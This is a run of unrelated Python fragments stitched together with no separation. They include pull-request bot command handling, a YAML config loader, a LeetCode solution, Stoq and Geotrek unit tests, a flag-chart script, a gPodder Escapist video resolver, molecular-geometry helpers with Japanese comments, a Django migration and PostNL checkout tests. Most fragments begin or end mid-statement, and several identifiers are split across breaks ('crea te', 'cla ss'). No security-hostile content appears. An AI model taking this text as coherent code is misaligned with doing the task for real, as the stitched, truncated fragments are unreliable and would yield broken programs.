`{:.7}`.'.format(msg, state.head_sha)) else: state.add_comment(':pushpin: Commit {:.7} has been approved by `{}`\n\n<!-- @{} r={} {} -->'.format(state.head_sha, approver, my_username, approver, state.head_sha)) elif word == 'r-': if try_only: if realtime: state.add_comment(':key: Insufficient privileges') continue state.approved_by = '' state.save() elif word.startswith('p='): try: state.priority = int(word[len('p='):]) except ValueError: pass state.save() elif word.startswith('delegate='): if try_only: if realtime: state.add_comment(':key: Insufficient privileges') continue state.delegate = word[len('delegate='):] state.save() if realtime: state.add_comment(':v: @{} can now approve this pull request'.format(state.delegate)) elif word == 'delegate-': state.delegate = '' state.save() elif word == 'delegate+': if try_only: if realtime: state.add_comment(':key: Insufficient privileges') continue state.delegate = state.get_repo().pull_request(state.num).user.login state.save() if realtime: state.add_comment(':v: @{} can now approve this pull request'.format(state.delegate)) elif word == 'retry' and realtime: state.set_status('') elif word in ['try', 'try-'] and realtime: state.try_ = word == 'try' state.merge_sha = '' state.init_build_res([]) state.save() elif word in ['rollup', 'rollup-']: state.rollup = word == 'rollup' state.save() elif
__author__ = 'Fabrizio Lungo<fab@lungo.co.uk>' import os import yaml from __exceptions__.FileNotFound import FileNotFound from section import ConfigurationSection class Configuration(ConfigurationSection): def __init__(self, fn='config.yml', name=None, crea
te=False): self._fn = fn self._create = create self.reload() if name is None: name=fn self._name = name def reload(self): if self._create and not os.path.exists(self._fn): self._config = {} elif os.path.exists(self._fn): with open(self._fn, "r") as f: self._config = yaml.load(f) else:
raise FileNotFound(filename=self._fn) def save(self): with open(self._fn, "w") as f: yaml.dump(self._config, f)
cla
ss Solution(object): def missingNumber(self, nums):
""" :type nums: List[int] :rtype: int """ xor = len(nums) for i, n in enumerate(nums): xor ^= n xor ^= i return xor inputs = [ [0], [1], [3,0,1], [9,6,4,2,3,5,7,0,1] ] s = Solution() for i in inputs: print s.missingNumber(i)
eek, NextWeek, ThisMonth, LastMonth, NextMonth) from stoqlib.gui.test.uitestutils import GUITest from stoqlib.lib.defaults import get_weekday_start from stoqlib.lib.introspection import get_all_classes class TestDateOptions(unittest.TestCase): def setUp(self): self._original_locale = locale.getlocale(locale.LC_ALL) def tearDown(self): self._set_locale(self._original_locale) def _get_week_interval(self, today): weekday = get_weekday_start() start = today + delta(weekday=weekday(-1)) end = start + delta(days=+6) return start, end def _get_month_interval(self, today): start = today + delta(day=1) end = start + delta(day=31) return start, end def _get_locales(self): # en_US: week starts on sunday # es_ES: week starts on monday return ["en_US.UTF-8", "es_ES.UTF-8"] def _starts_on_sunday(self, loc): return loc.startswith("en_US") def _set_locale(self, loc): try: loc = locale.setlocale(locale.LC_ALL, loc) except locale.Error: # Some locales could not be available on user's machine, leading # him to a false positive broke test, so skip it, informing the # problem. raise unittest.SkipTest("Locale %s not available" % (loc, )) else: os.environ['LC_ALL'] = loc def _testWeekday(self, loc, interval): if self._starts_on_sunday(loc): self.assertEqual( relativedelta.weekday(interval[0].weekday()), SU) self.assertEqual( relativedelta.weekday(interval[1].weekday()), SA) else: self.assertEqual( relativedelta.weekday(interval[0].weekday()), MO) self.assertEqual( relativedelta.weekday(interval[1].weekday()), SU) def test_this_week(self): option = ThisWeek() for loc in self._get_locales(): self._set_locale(loc) # starting in 2008/01/01, wednesday for i in range(1, 8): get_today_date = lambda: datetime.date(2008, 1, i) option.get_today_date = get_today_date self.assertEqual(option.get_interval(), self._get_week_interval(get_today_date())) self._testWeekday(loc, option.get_interval()) def test_last_week(self): option = LastWeek() for loc in self._get_locales(): self._set_locale(loc) # starting in 2008/01/01, wednesday for i in range(1, 8): get_today_date = lambda: datetime.date(2008, 1, i) option.get_today_date = get_today_date last_week_day = get_today_date() + delta(weeks=-1) self.assertEqual(option.get_interval(), self._get_week_interval(last_week_day)) self._testWeekday(loc, option.get_interval()) def test_next_week(self): option = NextWeek() for loc in self._get_locales(): self._set_locale(loc) # starting in 2008/01/01, wednesday for i in range(1, 8): get_today_date = lambda: datetime.date(2008, 1, i) option.get_today_date = get_today_date next_week_day = get_today_date() + delta(weeks=+1) self.assertEqual(option.get_interval(), self._get_week_interval(next_week_day)) self._testWeekday(loc, option.get_interval()) def test_this_month(self): option = ThisMonth() for loc in self._get_locales(): self._set_locale(loc) for month_day in [datetime.date(2007, 1, 1), datetime.date(2007, 1, 15), datetime.date(2007, 1, 31)]: option.get_today_date = lambda: month_day self.assertEqual(option.get_interval(), self._get_month_interval(month_day)) def test_last_month(self): option = LastMonth() for loc in self._get_locales(): self._set_locale(loc) for month_day in [datetime.date(2007, 1, 1), datetime.date(2007, 1, 15), datetime.date(2007, 1, 31)]: option.get_today_date = lambda: month_day last_month_day = month_day + delta(months=-1) self.assertEqual(option.get_interval(), self._get_month_interval(last_month_day)) def test_next_month(self): option = NextMonth() for loc in self._get_locales(): self._set_locale(loc) for month_day in [datetime.date(2007, 1, 1), datetime.date(2007, 1, 15), datetime.date(2007, 1, 31)]: option.get_today_date = lambda: month_day next_month_day = month_day + delta(months=+1) self.assertEqual(option.get_interval(), self._get_month_interval(next_month_day)) class TestSearchEditor(GUITest): """Tests for SearchEditor""" @mock.patch('stoqlib.gui.search.searcheditor.api.new_store') @mock.patch('stoqlib.gui.search.searcheditor.run_dialog') def test_run_editor(self, run_dialog, new_store): run_dialog.return_value = True new_store.return_value = self.store dialog = ProductSearch(store=self.store) dialog.search.refresh() dialog.results.select(dialog.results[0]) product = dialog.results[0].product with mock.patch.object(self.store, 'commit'): with mock.patch.object(self.store, 'close'): self.click(dialog._toolbar.edit_button) run_dialog.assert_called_once_with(ProductEditor, dialog, self.store, product, visual_mode=False) class TestSearchEvent(GUITest): def test_search_dialog_setup_search(self): class ProductSearchExtention(SearchExtension): spec_attributes = dict(ncm=Product.ncm) def get_columns(self): return [SearchColumn('ncm', title='NCM', data_type=str)] def _setup_search(dialog): return dialog.add_extension(ProductSearchExtention()) # At leat one product should have a NCM value, so we can verify the # results. product = self.store.find(Product).order_by(Product.te_id).first() product.ncm = u'12345678' SearchDialogSetupSearchEvent.connect(_setup_search) dialog = ProductSearch(self.store) dialog.search.refresh() self.check_search(dialog, 'product-search-extended') class TestQuantityColumn(GUITest): def test_format_func(self): class Fake(object): quantity = 0 column = QuantityColumn('quantity') obj = Fake() obj.quantity = None self.assertEquals(column._format_func(obj, True), '0') obj.quantity = 0 self.assertEquals(column._format_func(obj, True), '0') obj.quantity = 1 self.assertEquals(column._format_func(obj, True), '1') obj.product = self.create_product() obj.sellable = obj.product.sellable # Without a unit, it should still return just the number obj.quantity = 1 self.assertEquals(column._format_func(obj, True), '1') obj.sellable.unit = self.create_sellable_unit(u'Pc') self.assertEquals(column._format_func(obj, True), '1 Pc') obj.product.manage_stock = False self.assertEquals(column._format_func(obj, True), '1 Pc') obj.quantity = 0
self.assertEquals(column._format_func(obj, True), u"\u221E") class TestSearchGeneric(DomainTest): """Generic tests for searches""" # Those are base classes for other s
earches, and should not be instanciated ignored_classes = [
# -*- coding: utf-8 -*- """ Production settings file for project 'project' """ from project.settings import * DEBUG = False SITE_DOMAIN = 'sveetch.github.io/Sveetoy' # Directory where all stuff will be builded PUBLISH_DIR = os.path.join(PROJECT_DIR, '../docs') # Path where will be moved all the static files, usually this is a directory in # the ``PUBLISH_DIR`` STATIC_DIR = os.path.join(PROJECT_DIR, PUBLISH_DIR, 'static'
)
from pudzu.charts import * df = pd.read_csv("datasets/flagstriband.csv") df = pd.concat([pd.DataFrame(df.colours.apply(list).tolist(), columns=list("TMB")), df], axis=1).set_index("colours") FONT, SIZE = calibri, 24 fg, bg = "black", "#EEEEEE" default_img = "https://s-media-cache-ak0.pinimg.com/736x/0d/36/e7/0d36e7a476b06333d9fe9960572b66b9.jpg" COLORS = { "W": "white", "Y": "yellow", "R": "red", "G": "green", "B": "blue", "K": "black", } W, H = 320, 200 def label(c, size): w, h = size label = Image.from_text_bounded(" ", (W,H), SIZE, partial(FONT, bold=True), beard_line=True) description = Image.from_text_bounded(" ", (W,H), SIZE, partial(FONT, italics=True), beard_line=True) if c == "Y": flag = Triangle(max(w,h), "orange", "yellow", p=1.0).crop_to_aspect(w,h).trim(1).pad(1, "grey") else: flag = Rectangle((w-2, h-2), RGBA(COLORS.get(c)).blend(bg, 0.1)).pad(1, "grey") return Image.from_column([label, description, flag], padding=2, bg=bg) def process(d): if non(d['name']): return None label = Image.from_text_bounded(d['name'].replace("*","").upper(), (W,H), SIZE, partial(FONT, bold=True), beard_line=True) description = Image.from_text_bounded(get_non(d, 'description', " "), (W,H), SIZE, partial(FONT, italics=True), beard_line=True) flag = Image.from_url_with_cache(get_non(d, 'flag', default_img)).to_rgba() flag = flag.resize_fixed_aspect(height=H-2) if flag.width / flag.height < 1.3 else flag.resize((W-2,H-2)) flag = flag.pad(1, "grey") flaglabel = Image.from_column([label, description, flag], padding=2, bg=bg) if "*" in d['name']: flaglabel = flaglabel.blend(Rectangle(flaglabel.
size, bg), 0.3) return flaglabel def grid(middle): ms = df[df.M == middle] colors = "".join(COLORS).replace(middle,"") array = [[dict(ms.loc[b+middle+t][["name", "description", "flag"]]) for b in colors] for t in colors] data = pd.DataFrame(array, index=list(colors), columns=list(colors)) grid = grid_chart(data, process, padding=(10,20), fg=fg, bg=bg, yalign=1, row
_label=lambda row: label(data.index[row], (100, H)), col_label=lambda col: label(data.columns[col], (W,100)), corner_label=label(middle, (100,100))) return grid PAD = 100 grids = list(generate_batches([grid(c) for c in COLORS], 2)) grid = Image.from_array(grids, padding=(PAD,PAD//2), bg=bg) title = Image.from_column([ Image.from_text_bounded("From Austria to Zanzibar".upper(), grid.size, 360, partial(FONT, bold=True), fg=fg, bg=bg, padding=(PAD,20)), Image.from_text_bounded("a catalog of horizontal triband flags".upper(), grid.size, 240, partial(FONT, bold=True), fg=fg, bg=bg, padding=(PAD,20)), ], padding=0) img = Image.from_column([title, grid], bg=bg, padding=(20,0)).pad(10, bg) img.place(Image.from_text("/u/Udzu", FONT(48), fg=fg, bg=bg, padding=10).pad((2,2,0,0), fg), align=1, padding=10, copy=False) img.save("output/flagstriband.png") img.resize_fixed_aspect(scale=0.5).save("output/flagstriband2.png")
# -*- coding: utf-8 -*- # # gPodder - A media aggregator and podcast client # Copyright (c) 2005-2014 Thomas Perl and the gPodder Team # # gPodder is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 3 of the License, or # (at your option) any later version. # # gPodder is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # # # gpodder.escapist - Escapist Videos download magic # somini <somini29@yandex.com>; 2014-09-14 # import gpodder from gpodder import util import logging logger = logging.getLogger(__name__) try: # For Python < 2.6, we use the "simplejson" add-on module import simplejson as json except ImportError: # Python 2.6 already ships with a nice "json" module import json import re # This matches the more reliable URL ESCAPIST_NUMBER_RE = re.compile(r'http://www.escapistmagazine.com/videos/view/(\d+)', re.IGNORECASE) # This matches regular URL, mainly those that come in the RSS feeds ESCAPIST_REGULAR_RE = re.compile(r'http://www.escapistmagazine.com/videos/view/([\w-]+)/(\d+)-', re.IGNORECASE) # This finds the RSS for a given URL DATA_RSS_RE = re.compile(r'http://www.escapistmagazine.com/rss/video
s/list/([1-9][0-9]*)\.xml') # This matches the flash player's configuration. It's a JSON, but it's always malformed DATA_CONFIG_RE = re.compile(r'flashvars=.*config=(http.*\.js)', re.IGNORECASE) # This matches the actual MP4 url, inside the "JSON" DATA_CONFIG_DATA_RE = re.compile(r'http[:/\w.?&-]*\.mp4') # This matches the cover art for an RSS. We shouldn't parse XML with regex. DATA_COVERART_RE = re.compi
le(r'<url>(http:.+\.jpg)</url>') class EscapistError(BaseException): pass def get_real_download_url(url): video_id = get_escapist_id(url) if video_id is None: return url web_data = get_escapist_web(video_id) data_config_frag = DATA_CONFIG_RE.search(web_data) if data_config_frag is None: raise EscapistError('Cannot get flashvars URL from The Escapist') data_config_url = data_config_frag.group(1) logger.debug('Config URL: %s', data_config_url) data_config_data = util.urlopen(data_config_url).read().decode('utf-8') data_config_data_frag = DATA_CONFIG_DATA_RE.search(data_config_data) if data_config_data_frag is None: raise EscapistError('Cannot get configuration JS from The Escapist') real_url = data_config_data_frag.group(0) if real_url is None: raise EscapistError('Cannot get MP4 URL from The Escapist') elif "-ad-rotation/" in real_url: raise EscapistError('Oops, seems The Escapist blocked this IP. Wait a few days/weeks to get it unblocked') else: return real_url def get_escapist_id(url): result = ESCAPIST_NUMBER_RE.match(url) if result is not None: return result.group(1) result = ESCAPIST_REGULAR_RE.match(url) if result is not None: return result.group(2) return None def is_video_link(url): return (get_escapist_id(url) is not None) def get_real_channel_url(url): video_id = get_escapist_id(url) if video_id is None: return url web_data = get_escapist_web(video_id) data_config_frag = DATA_RSS_RE.search(web_data) if data_config_frag is None: raise EscapistError('Cannot get RSS URL from The Escapist') return data_config_frag.group(0) def get_real_cover(url): rss_url = get_real_channel_url(url) if rss_url is None: return None rss_data = util.urlopen(rss_url).read() rss_data_frag = DATA_COVERART_RE.search(rss_data) if rss_data_frag is None: return None return rss_data_frag.group(1) def get_escapist_web(video_id): if video_id is None: return None web_url = 'http://www.escapistmagazine.com/videos/view/%s' % video_id return util.urlopen(web_url).read()
(isinstance(res, AtomGroup)) (AAN_part, res_part) = self._match_residues(AAN['2'], res) # for NME if next_aa is not None: if next_aa.has_atom('C'): AAN_part.set_atom('C2', AAN['1']['C']) res_part.set_atom('C2', next_aa['C']) if next_aa.has_atom('O'): AAN_part.set_atom('O2', AAN['1']['O']) res_part.set_atom('O2', next_aa['O']) if next_aa.has_atom('CA'): AAN_part.set_atom('CH3', AAN['1']['CH3']) res_part.set_atom('CH3', next_aa['CA']) sp = Superposer(AAN_part, res_part) rmsd = sp.rmsd matched_AAN = sp.superimpose(AAN) return (matched_AAN, rmsd) def _match_residues(self, res1, res2, max_number_of_atoms=-1): """ 2つのアミノ酸残基のN, H, CA, HA, C, Oの原子を突き合わせる。 アミノ酸残基がプロリンだった場合は、CDの炭素をHに命名する。 GLYはHA1, HA2とあるので突き合せない。 """ atom_names = ['CA', 'O', 'C', 'N', 'CB', 'HA'] if max_number_of_atoms == -1: max_number_of_atoms = len(atom_names) ans_res1 = AtomGroup() ans_res2 = AtomGroup() for atom_name in atom_names: pickup_atoms1 = res1.pickup_atoms(atom_name) if len(pickup_atoms1) > 0: pickup_atoms2 = res2.pickup_atoms(atom_name) if len(pickup_atoms2) > 0: ans_res1.set_atom(atom_name, pickup_atoms1[0]) ans_res2.set_atom(atom_name, pickup_atoms2[0]) if ans_res1.get_number_of_atoms() >= max_number_of_atoms: break # match amino-'H' if ans_res1.get_number_of_atoms() < max_number_of_atoms: res1_H = None res2_H = None if res1.has_atom('H'): res1_H = res1['H'] elif res1.has_atom('CD'): # for proline res1_H = res1['CD'] if res2.has_atom('H'): res2_H = res2['H'] elif res2.has_atom('CD'): res2_H = res2['CD'] if ((res1_H is not None) and (res2_H is not None)): ans_res1.set_atom('H', res1_H) ans_res2.set_atom('H', res2_H) return (ans_res1, ans_res2) # ----------------------------------------------------------------- def add_methyl(self, C1, C2): """ -CH3の水素を付加 C1に水素を付加 """ assert(isinstance(C1, Atom)) assert(isinstance(C2, Atom)) ethane = AtomGroup() ethane.set_atom('C1', Atom(symbol='C', name='C1', position=Position(0.00000, 0.00000, 0.00000))) ethane.set_atom('H11', Atom(symbol='H', name='H11', position=Position(-0.85617, -0.58901, -0.35051))) ethane.set_atom('H12', Atom(symbol='H', name='H12', position=Position(-0.08202, 1.03597, -0.35051))) ethane.set_atom('H13', Atom(symbol='H', name='H13',
position=Position(0.93818, -0.44696, -0.35051))) ethane.set_atom('C2', Atom(symbol='C', name='C2', position=Position(0.00000, 0.00000, 1.47685))) ethane.set_atom('H21', Atom(symbol='H', name='H21', position=Positi
on(-0.93818, 0.44696, 1.82736))) ethane.set_atom('H22', Atom(symbol='H', name='H22', position=Position(0.85617, 0.58901, 1.82736))) ethane.set_atom('H23', Atom(symbol='H', name='H23', position=Position(0.08202, -1.03597, 1.82736))) inC21 = C2.xyz - C1.xyz refC21 = ethane['C2'].xyz - ethane['C1'].xyz shift = C1.xyz - ethane['C1'].xyz rot = self.arbitary_rotate_matrix(inC21, refC21) ethane.rotate(rot) ethane.shift_by(shift) assert(C1.xyz == ethane['C1'].xyz) answer = AtomGroup() answer.set_atom('H11', ethane['H11']) answer.set_atom('H12', ethane['H12']) answer.set_atom('H13', ethane['H13']) return answer # ----------------------------------------------------------------- def get_NH3(self, angle=0.5 * math.pi, length=1.0): pi23 = math.pi * 2.0 / 3.0 # (pi * 2/3) sin23 = math.sin(pi23) cos23 = math.cos(pi23) # pi43 = math.pi * 4.0 / 3.0 # (pi * 4/3) # sin43 = math.sin(pi43) # cos43 = math.cos(pi43) sin_input = math.sin(angle) cos_input = math.cos(angle) # z軸まわりに120度回転 # z1_rot = Matrix(3, 3) # z1_rot.set(0, 0, cos23) # z1_rot.set(0, 1, -sin23) # z1_rot.set(1, 0, sin23) # z1_rot.set(1, 1, cos23) # z1_rot.set(2, 2, 1.0) # z軸まわりに240度回転 # z2_rot = Matrix(3, 3) # z2_rot.set(0, 0, cos43) # z2_rot.set(0, 1, -sin43) # z2_rot.set(1, 0, sin43) # z2_rot.set(1, 1, cos43) # z2_rot.set(2, 2, 1.0) # y軸まわりに回転 # y_rot = Matrix(3, 3) # y_rot.set(0, 0, cos_input) # y_rot.set(0, 2, -sin_input) # y_rot.set(2, 0, sin_input) # y_rot.set(2, 2, cos_input) # y_rot.set(1, 1, 1.0) # pos_H1 = Position(1.0, 0.0, 0.0) # pos_H1.rotate(y_rot) # pos_H1 *= length # pos_H2 = Position(1.0, 0.0, 0.0) # pos_H2.rotate(y_rot) # pos_H2.rotate(z1_rot) # pos_H2 *= length # pos_H3 = Position(1.0, 0.0, 0.0) # pos_H3.rotate(y_rot) # pos_H3.rotate(z2_rot) # pos_H3 *= length # X-Z平面上、Y軸に対してangle度開く xz_rot = Matrix(3, 3) xz_rot.set(0, 0, cos_input) xz_rot.set(0, 2, -sin_input) xz_rot.set(2, 0, sin_input) xz_rot.set(2, 2, cos_input) xz_rot.set(1, 1, 1.0) # X-Y平面上、Z軸に対して120度開く xy_rot = Matrix(3, 3) xy_rot.set(0, 0, cos23) xy_rot.set(0, 1, -sin23) xy_rot.set(1, 0, sin23) xy_rot.set(1, 1, cos23) xy_rot.set(2, 2, 1.0) pos_H1 = Position(0.0, 0.0, 1.0) pos_H1.rotate(xz_rot) pos_H2 = Position(0.0, 0.0, 1.0) pos_H2.rotate(xz_rot) pos_H2.rotate(xy_rot) pos_H3 = Position(0.0, 0.0, 1.0) pos_H3.rotate(xz_rot) pos_H3.rotate(xy_rot) pos_H3.rotate(xy_rot) pos_H1 *= length pos_H2 *= length pos_H3 *= length NH3 = AtomGroup() N = Atom(symbol='N', position=Position(0.0, 0.0, 0.0)) H1 = Atom(symbol='H', position=pos_H1) H2 = Atom(symbol='H', position=pos_H2) H3 = Atom(symbol='H', position=pos_H3) # X1 = Atom(symbol = 'X', # position = Position(1.0, 0.0, 0.0)) # X2 = Atom(symbol = 'X', # position = Position(0.0, 1.0, 0.0)) # X3 = Atom(symbol = 'X', # position = Position(0.0, 0.0, 1.0)) NH3.set_atom('N', N) NH3.set_atom('H1', H1) NH3.set_atom('H2', H2) NH3.set_atom('H3', H3) # NH3.set_atom('X1', X1) # NH3.set_atom('X2', X2) # NH3.set_atom('X3', X3) return NH3 # ----------------------------------------------------------------- def select_residues(self, chain, from_resid, to_resid): ''' 連続したアミノ酸残基を返す ''' answer = AtomGroup() for resid, res in chain.groups(): resid = int(resid) if from_resid <= resid <= to_resid: answer |= res return answer # ----------------------------------------------------------------- def arbitary_rotate_matrix(self, in_a, in_b): """ ベクトルaをbへ合わせる回転行列(3x3)を返す """ assert(isinstance(in_a, Position)) assert(isinstance(in_b, Position)) a = Position(in_a) b = Position(in_b) a.norm() b.norm() cos_theta = a.dot(b) sin_theta = math.sqrt(1 - cos_theta * cos_theta) n = a.cross
self.assertCountEqual(trek.services, []) @skipIf(not settings.TREKKING_TOPOLOGY_ENABLED, 'Test with dynamic segmentation only') def test_deleted_pois(self): p1 = PathFactory.create(geom=LineString((0, 0), (4, 4))) trek = TrekFactory.create(paths=[p1]) poi = POIFactory.create(paths=[(p1, 0.6, 0.6)]) self.assertCountEqual(trek.pois, [poi]) poi.delete() self.assertCountEqual(trek.pois, []) @skipIf(not settings.TREKKING_TOPOLOGY_ENABLED, 'Test with dynamic segmentation only') def test_deleted_services(self): p1 = PathFactory.create(geom=LineString((0, 0), (4, 4))) trek = TrekFactory.create(paths=[p1]) service = ServiceFactory.create(paths=[(p1, 0.6, 0.6)]) service.type.practices.add(trek.practice) self.assertCountEqual(trek.services, [service]) service.delete() self.assertCountEqual(trek.services, []) @skipIf(not settings.TREKKING_TOPOLOGY_ENABLED, 'Test with dynamic segmentation only') def test_pois_should_be_ordered_by_progression(self): p1 = PathFactory.create(geom=LineString((0, 0), (4, 4))) p2 = PathFactory.create(geom=LineString((4, 4), (8, 8))) self.trek = TrekFactory.create(paths=[p1, p2]) self.trek_reverse = TrekFactory.create(paths=[(p2, 0.8, 0), (p1, 1, 0.2)]) self.poi1 = POIFactory.create(paths=[(p1, 0.8, 0.8)]) self.poi2 = POIFactory.create(paths=[(p1, 0.3, 0.3)]) self.poi3 = POIFactory.create(paths=[(p2, 0.5, 0.5)]) pois = self.trek.pois self.assertEqual([self.poi2, self.poi1, self.poi3], list(pois)) pois = self.trek_reverse.pois self.assertEqual([self.poi3, self.poi1, self.poi2], list(pois)) @skipIf(settings.TREKKING_TOPOLOGY_ENABLED, 'Test without dynamic segmentation only')
def test_pois_is_not_ordered_by_progression(self): self.trek = TrekFactory.create(geom=LineString((0, 0)
, (8, 8))) self.trek_reverse = TrekFactory.create(geom=LineString((6.4, 6.4), (0.8, 0.8))) self.poi1 = POIFactory.create(geom=Point(3.2, 3.2)) self.poi2 = POIFactory.create(geom=Point(1.2, 1.2)) self.poi3 = POIFactory.create(geom=Point(4, 4)) pois = self.trek.pois self.assertCountEqual([self.poi1, self.poi2, self.poi3], pois) pois = self.trek_reverse.pois self.assertCountEqual([self.poi1, self.poi2, self.poi3], pois) @skipIf(not settings.TREKKING_TOPOLOGY_ENABLED, 'Test with dynamic segmentation only') def test_city_departure(self): p1 = PathFactory.create(geom=LineString((0, 0), (5, 5))) trek = TrekFactory.create(paths=[p1]) self.assertEqual(trek.city_departure, '') city1 = CityFactory.create(geom=MultiPolygon(Polygon(((-1, -1), (3, -1), (3, 3), (-1, 3), (-1, -1))))) city2 = CityFactory.create(geom=MultiPolygon(Polygon(((3, 3), (9, 3), (9, 9), (3, 9), (3, 3))))) self.assertEqual([city for city in trek.cities], [city1, city2]) self.assertEqual(trek.city_departure, str(city1)) @skipIf(settings.TREKKING_TOPOLOGY_ENABLED, 'Test without dynamic segmentation only') def test_city_departure_nds(self): trek = TrekFactory.create(geom=LineString((0, 0), (5, 5))) self.assertEqual(trek.city_departure, '') city1 = CityFactory.create(geom=MultiPolygon(Polygon(((-1, -1), (3, -1), (3, 3), (-1, 3), (-1, -1))))) city2 = CityFactory.create(geom=MultiPolygon(Polygon(((3, 3), (9, 3), (9, 9), (3, 9), (3, 3))))) self.assertEqual([city for city in trek.cities], [city1, city2]) self.assertEqual(trek.city_departure, str(city1)) class TrekUpdateGeomTest(TestCase): @classmethod def setUpTestData(cls): cls.trek = TrekFactory.create(published=True, geom=LineString(((700000, 6600000), (700100, 6600100)), srid=2154)) def test_save_with_same_geom(self): geom = LineString(((700000, 6600000), (700100, 6600100)), srid=2154) self.trek.geom = geom self.trek.save() retrieve_trek = Trek.objects.get(pk=self.trek.pk) self.assertTrue(retrieve_trek.geom.equals_exact(geom, tolerance=0.00001)) def test_save_with_another_geom(self): geom = LineString(((-7, -7), (5, -7), (5, 5), (-7, 5), (-7, -7)), srid=2154) self.trek.geom = geom self.trek.save() retrieve_trek = Trek.objects.get(pk=self.trek.pk) if settings.TREKKING_TOPOLOGY_ENABLED: self.assertFalse(retrieve_trek.geom.equals_exact(geom, tolerance=0.00001)) else: self.assertTrue(retrieve_trek.geom.equals_exact(geom, tolerance=0.00001)) def test_save_with_provided_one_field_exclusion(self): self.trek.save(update_fields=['geom']) self.assertTrue(self.trek.pk) def test_save_with_multiple_fields_exclusion(self): new_trek = TrekFactory.create() new_trek.description_en = 'Description Test update' new_trek.ambiance = 'Very special ambiance, for test purposes.' new_trek.save(update_fields=['description_en']) db_trek = Trek.objects.get(pk=new_trek.pk) self.assertTrue(db_trek.pk) self.assertEqual(db_trek.description_en, 'Description Test update') self.assertNotEqual(db_trek.ambiance, 'Very special ambiance, for test purposes.') new_trek.save(update_fields=['ambiance_en']) db_trek = Trek.objects.get(pk=new_trek.pk) self.assertEqual(db_trek.ambiance_en, 'Very special ambiance, for test purposes.') class TrekItinerancyTest(TestCase): def test_next_previous(self): trekA = TrekFactory(name="A") trekB = TrekFactory(name="B") trekC = TrekFactory(name="C") trekD = TrekFactory(name="D") OrderedTrekChild(parent=trekC, child=trekA, order=42).save() OrderedTrekChild(parent=trekC, child=trekB, order=15).save() OrderedTrekChild(parent=trekD, child=trekA, order=1).save() self.assertEqual(list(trekA.children_id), []) self.assertEqual(list(trekB.children_id), []) self.assertEqual(list(trekC.children_id), [trekB.id, trekA.id]) self.assertEqual(list(trekD.children_id), [trekA.id]) self.assertEqual(trekA.next_id, {trekC.id: None, trekD.id: None}) self.assertEqual(trekB.next_id, {trekC.id: trekA.id}) self.assertEqual(trekC.next_id, {}) self.assertEqual(trekD.next_id, {}) self.assertEqual(trekA.previous_id, {trekC.id: trekB.id, trekD.id: None}) self.assertEqual(trekB.previous_id, {trekC.id: None}) self.assertEqual(trekC.previous_id, {}) self.assertEqual(trekD.previous_id, {}) def test_delete_child(self): trekA = TrekFactory(name="A") trekB = TrekFactory(name="B") trekC = TrekFactory(name="C") OrderedTrekChild(parent=trekA, child=trekB, order=1).save() OrderedTrekChild(parent=trekA, child=trekC, order=2).save() self.assertTrue(OrderedTrekChild.objects.filter(child=trekB).exists()) self.assertQuerysetEqual(trekA.children, ['<Trek: B>', '<Trek: C>']) self.assertQuerysetEqual(trekB.parents, ['<Trek: A>']) self.assertQuerysetEqual(trekC.parents, ['<Trek: A>']) self.assertEqual(list(trekA.children_id), [trekB.id, trekC.id]) self.assertEqual(trekB.parents_id, [trekA.id]) self.assertEqual(trekC.parents_id, [trekA.id]) trekB.delete() self.assertEqual(trekC.previous_id_for(trekA), None) self.assertEqual(trekC.next_id_for(trekA), None) self.assertEqual(trekC.next_id, {trekA.id: None}) self.assertEqual(trekC.previous_id, {trekA.id: None}) self.assertFalse(OrderedTrekChild.objects.filter(child=trekB).exists()) self.assertQuerysetEqual(trekA.children, ['<Trek: C>']) self.assertQuerysetEqual(trekC.parents, ['<Trek: A>']) self.assert
# -*- coding: utf-8 -*- # Generated by Django 1.9.7 on 2016-06-20 23:54 from __future__ import unicode_literals from django.db import migrations, models import django.db.models.
deletion class Migration(migrations.Migration): dependencies = [ ('authentication', '0003_aut
o_20160620_2027'), ('feed', '0005_auto_20160620_1547'), ] operations = [ migrations.AddField( model_name='post', name='author', field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, related_name='posts', to='authentication.Profile'), preserve_default=False, ), ]
ort HTTMock from django_dynamic_fixture import G, N from postnl_checkout.contrib.django_postnl_checkout.models import Order from .base import PostNLTestMixin class OrderTests(PostNLTestMixin, TestCase): """ Tests for Order model. """ maxDiff = None def setUp(self): super(OrderTests, self).setUp() self.order_datum = datetime.datetime( year=2011, month=7, day=21, hour=20, minute=11, second=0 ) self.verzend_datum = datetime.datetime( year=2011, month=7, day=22, hour=20, minute=11, second=0 ) def test_save(self): """ Test saving an Order model. """ instance = N(Order) instance.clean() instance.save() def test_prepare_order(self): """ Test prepare_order class method. """ # Setup mock response def response(url, request): self.assertXMLEqual( request.body, self.read_file('prepare_order_request.xml') ) return self.read_file('prepare_order_response.xml') kwargs = { 'AangebodenBetaalMethoden': { 'PrepareOrderBetaalMethode': { 'Code': 'IDEAL', 'Prijs': '5.00' } }, 'AangebodenCommunicatieOpties': { 'PrepareOrderCommunicatieOptie': { 'Code': 'NEWS' } }, # FIXME: the following is not submitted by SUDS # Most probably because it is not properly defined in the WSDL # Contact PostNL about this. # 'AangebodenOpties': { # 'PrepareOrderOptie': { # 'Code': 'WRAP', # 'Prijs': '2.50' # } # }, # 'AfleverOpties': { # 'AfleverOptie': { # 'Code': 'PG', # 'Kosten': '0.00', # 'Toegestaan': True # } # }, 'Consument': { 'ExtRef': 'test@e-id.nl' }, 'Contact': { 'Url': 'http://www.kadowereld.nl/url/contact' }, 'Order': { 'ExtRef': '1105_900', 'OrderDatum': self.order_datum, 'Subtotaal': '125.00', 'VerzendDatum': self.verzend_datum, 'VerzendKosten': '12.50' }, 'Retour': { 'BeschrijvingUrl': 'http://www.kadowereld.nl/url/beschrijving', 'PolicyUrl': 'http://www.kadowereld.nl/url/policy', 'RetourTermijn': 28, 'StartProcesUrl': 'http://www.kadowereld.nl/url/startproces' }, 'Service': { 'Url': 'http://www.kadowereld.nl/url/service' } } # Execute API call with HTTMock(response): instance = Order.prepare_order(**kwargs) # Assert model field values self.assertTrue(instance.pk) self.assertEquals( instance.order_token, '0cfb4be2-47cf-4eac-865c-d66657953d5c' ) self.assertEquals( instance.order_ext_ref, '1105_900' ) self.assertEquals( instance.order_date, self.order_datum ) # Assert JSON values self.assertEquals(instance.prepare_order_request, 